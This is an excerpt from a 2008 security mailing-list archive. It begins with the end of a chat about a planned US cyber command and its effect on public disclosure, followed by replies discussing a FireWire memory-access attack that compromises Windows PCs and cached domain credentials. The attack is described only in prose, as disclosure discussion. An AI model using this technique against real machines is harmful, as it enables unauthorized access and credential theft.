Mar 03 22:59:07 they do.
Mar 03 22:59:18 oh have they hired hd moore?
Mar 03 23:00:13 trust me the us gov rely on what's posted to the mailing lists as much as everyone else
Mar 03 23:00:31 we are in a cyber war? sheeeesh last night we were in a trojan war
Mar 03 23:00:35 and if they start attacking other nations when the cyber command is built
Mar 03 23:00:49 then non-us hackers will stop posting to mailing lists
Mar 03 23:01:06 then the whole security community will fuck up
Mar 03 23:01:23 the cyber command is nothing new.
Mar 03 23:01:31 it is
Mar 03 23:01:34 It is just a structural reorganization.
Mar 03 23:01:41 it's more than that
Mar 03 23:01:55 this is about attacking nations
Mar 03 23:01:59 you actually think that everything they are advertising isn't going on already?
Mar 03 23:02:31 not on as big a scale as they're planning
Mar 03 23:02:53 60,000+ cyber command staff in a purpose built cyber battle center
Mar 03 23:03:53 these dorks will bring the end to the security community as we know it the dumb asses
Mar 03 23:04:17 nothing will get publicly disclosed if real cyber war breaks out
Mar 03 23:06:06 it's not going to be as big as you think.
Mar 03 23:06:24 It's going to put a lot of existing jobs and stations under a central command.
Mar 03 23:07:20 a strategic command?
Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere.
Mar 03 23:15:50 how many real hackers out of the hundreds of script kids will they hire
Mar 03 23:16:13 there ain't that many "elite" hackers out there
Mar 03 23:16:28 that's where defense contractors come in.
Mar 03 23:20:24 what do you mean
Mar 03 23:23:00 a lot of talent consults for the government.
Mar 03 23:23:30 a chinese defence contractor is going to give hackers to us so the us can black out chinese infrastructure when us get angry with china?
Mar 03 23:24:11 there are plenty of chinese foreign nationals working for the US government.
Mar 03 23:29:36 I'm off to bed. Goodnight.

From eric at rachner.us Wed Mar 5 02:13:10 2008
From: eric at rachner.us (Eric Rachner)
Date: Tue, 4 Mar 2008 18:13:10 -0800
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
Message-ID: <003301c87e66$77981a40$66c84ec0$@us>

Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification.
(details at http://storm.net.nz/projects/16)

- Eric

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer
Sent: Tuesday, March 04, 2008 4:01 PM
To: Untitled
Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed

The key to the vulnerability:

"To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory."

I assume this makes it a local login, not a domain login.

"Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire."

So does the same capability exist on Macs?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com
From eric at rachner.us Wed Mar 5 02:15:13 2008
From: eric at rachner.us (Eric Rachner)
Date: Tue, 4 Mar 2008 18:15:13 -0800
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
Message-ID: <003701c87e66$c0e13dd0$42a3b970$@us>

Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification.

(details at http://storm.net.nz/projects/16)

- Eric